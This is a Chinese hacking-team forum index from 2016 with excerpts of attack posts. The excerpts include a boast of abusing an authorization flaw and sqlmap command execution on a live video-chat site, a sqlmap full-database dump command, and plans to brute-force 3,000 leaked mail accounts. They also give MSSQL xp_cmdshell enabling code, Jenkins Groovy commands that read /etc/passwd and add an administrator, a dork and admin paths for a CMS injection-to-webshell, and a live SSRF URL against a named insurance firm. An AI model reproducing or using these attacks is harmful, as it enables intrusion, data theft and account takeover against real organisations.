秒杀某视频聊天网站-直桶内网不过这个站我要留着,所以暂时不公布地址通过一个越权漏洞和1个注入漏洞看看金币模式,你就蛋痛了花钱购买金币,这不是吭么我自己给自己账号加了这么多金币,我想可能够了然后注入点,直接用SQLMAP执行-os-cmd命令成功提权,由于在内网,就不深入了...
2016-07-20 /
1219 次浏览 /
核心成员
作者:0x80(来自14X安全团队)XSS一般在平台网页上能够执行相关的JS代码之后,那是触发请求原理而定的那么还有一种就是本地域的XSS了====================================================================本地域,也就是在本地执行XSS条件是参数绕过,比如已经禁止你执行SCRIPT的情况下你怎么访问都是501的,这时候,需要看下本地域复制当前源代码到本地,建立1个HTML写个HTML页面以本地127打开12...
2016-07-20 /
1122 次浏览 /
核心成员
一段SQLMAP命令脱掉整站数据存在的注入点sqlmap.py -u http://127.0.0.1/as.php?id=" -D "要脱的数据库' --dump-all...
2016-07-20 /
1276 次浏览 /
网络安全
意外得到163,3000个邮箱账号,剩下的就是爆破了...
2016-07-20 /
1515 次浏览 /
网络安全
1433 SA 升权代码碰到SA权限降权的时候需要在SQL查询分析器里,输入EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;即可升权代码...
2016-06-17 /
1618 次浏览 /
网络安全
Jenkins CommonCollectionsprintln "cat etc/passwd".execute().text 需要配合SSH反弹WIN println "net localgroup administrators xxx/add".execute().text...
2016-06-17 /
1042 次浏览 /
网络安全
某企业CMS管理系统存在通用SQL注入漏洞+GETSHELL 作者:0X80inurl:index.php?ie=
技术支持: 宝鸡市世纪网络技术有限公司默认后台:Adm/governlgn.php 或者 Admin/governlgn.php均存在POST注入进入后台,可设置上传类型,直接GETSHELL,不要做坏事额...
2016-06-17 /
2352 次浏览 /
网络安全
0x80历届视频教程经典回顾(提供下载)XP系统内网提权下载地址:http://pan.baidu.com/s/1dD3riTz全手工php注射+注入root+hex,mid函数,load_filehttp://pan.baidu.com/s/1jGxaq7Glinux 提权 http://pan.baidu.com/s/1o6I8pLK ;解压密码:80bad实战秒掉某银行http://pan.baidu.com/s/1jGFsZky...
2016-06-17 /
1397 次浏览 /
网络安全
江泰保险经纪股份有限公司某站Weblogic SSRF漏洞可探测内网http://bms.jiangtai.com/uddiexplorer//SearchPublicRegistries.jsp?operator=http://localhost:29001&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&...
2016-06-17 /
1878 次浏览 /
网络安全
JAVA编程系列课程 作者:0X80这是我之前做的一套课程,主要针对想接触了解JAVA的朋友,后期几课再补上,希望大家支持,谢谢1、java 编程语言基本功能及特点2、Java 第1个java程序,JAVA开始之旅3、java if for 循环的实例4、java jframe 图形界面框架编写实例5、java list 集合与数组溢出实例6、 java 编程面向对象 思想7、JAVA类,对象,构造方法8、JAVA线程 T...
2016-06-17 /
1237 次浏览 /
核心成员